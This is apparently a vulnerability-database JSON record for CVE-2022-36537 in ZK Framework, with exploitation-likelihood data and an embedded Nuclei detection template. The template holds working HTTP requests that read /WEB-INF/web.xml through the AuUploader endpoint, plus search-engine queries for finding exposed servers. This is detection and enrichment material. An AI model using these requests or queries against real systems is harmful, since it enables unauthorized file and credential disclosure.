{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2022-36537/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2022-36537/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2022-36537/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2022-36537/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2022-36537/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2022-36537"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2022-36537"
    }
  },
  "enrichments": {
    "cisa-kev": {
      "kev": true
    },
    "epss": {
      "epss": 0.95397,
      "kev": true,
      "percentile": 0.99867
    },
    "nuclei": {
      "nuclei": true,
      "nuclei_template": "http/cves/2022/CVE-2022-36537.yaml",
      "nuclei_template_severity": "high",
      "nuclei_template_yaml": "id: CVE-2022-36537\n\ninfo:\n  name: ZK Framework - Information Disclosure\n  author: theamanrawat\n  severity: high\n  description: |\n    ZK Framework 9.6.1, 9.6.0.1, 9.5.1.3, 9.0.1.2 and 8.6.4.1 is susceptible to information disclosure. An attacker can access sensitive information via a crafted POST request to the component AuUploader and thereby possibly obtain additional sensitive information, modify data, and/or execute unauthorized operations.\n  impact: |\n    The vulnerability can lead to the exposure of sensitive data, such as credentials or internal system information.\n  remediation: |\n    Apply the latest security patches or updates provided by the ZK Framework to fix the information disclosure vulnerability.\n  reference:\n    - https://github.com/Malwareman007/CVE-2022-36537/\n    - https://tracker.zkoss.org/browse/ZK-5150\n    - https://nvd.nist.gov/vuln/detail/CVE-2022-36537\n    - https://www.bleepingcomputer.com/news/security/cisa-warns-of-hackers-exploiting-zk-java-framework-rce-flaw/\n    - https://github.com/ARPSyndicate/kenzer-templates\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n    cvss-score: 7.5\n    cve-id: CVE-2022-36537\n    cwe-id: CWE-200\n    epss-score: 0.95397\n    epss-percentile: 0.99867\n    cpe: cpe:2.3:a:zkoss:zk_framework:*:*:*:*:*:*:*:*\n  metadata:\n    verified: true\n    max-request: 2\n    vendor: zkoss\n    product: zk_framework\n    shodan-query:\n      - http.title:\"Server backup manager\"\n      - http.title:\"server backup manager\"\n    fofa-query: title=\"server backup manager\"\n    google-query: intitle:\"server backup manager\"\n  tags: cve,cve2022,zk-framework,exposure,unauth,kev,intrusive,zkoss,vkev,vuln\n\nhttp:\n  - raw:\n      - |\n        GET /login.zul HTTP/1.1\n        Host: {{Hostname}}\n      - |\n        POST /zkau/upload?uuid=101010&dtid={{dtid}}&sid=0&maxsize=-1 HTTP/1.1\n        Host: {{Hostname}}\n        Accept-Encoding: gzip, deflate\n        Accept: */*\n        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryCs6yB0zvpfSBbYEp\n        Content-Length: 154\n\n        ------WebKitFormBoundaryCs6yB0zvpfSBbYEp\n        Content-Disposition: form-data; name=\"nextURI\"\n\n        /WEB-INF/web.xml\n        ------WebKitFormBoundaryCs6yB0zvpfSBbYEp--\n\n    matchers-condition: and\n    matchers:\n      - type: regex\n        part: body\n        regex:\n          - <display-name>.*</display-name>\n          - |-\n            <welcome-file-list>((.|\n            )*)welcome-file-list>\n          - xml version\n          - web-app\n        condition: and\n\n      - type: status\n        status:\n          - 200\n\n    extractors:\n      - type: regex\n        name: dtid\n        group: 1\n        regex:\n          - \"dt:'(.*?)',cu:\"\n        internal: true\n# digest: 4a0a0047304502201d013b6ef64820eb751f004aa80f18fe86c98768e4d510edb940751d3e981fde022100f080c2bcb0ae616de818bbb2dbf03b418c570be52353e953a3878775c79a289b:922c64590222798bb761d5b6d8e72950"
    }
  },
  "vuln_id": "cve-2022-36537"
}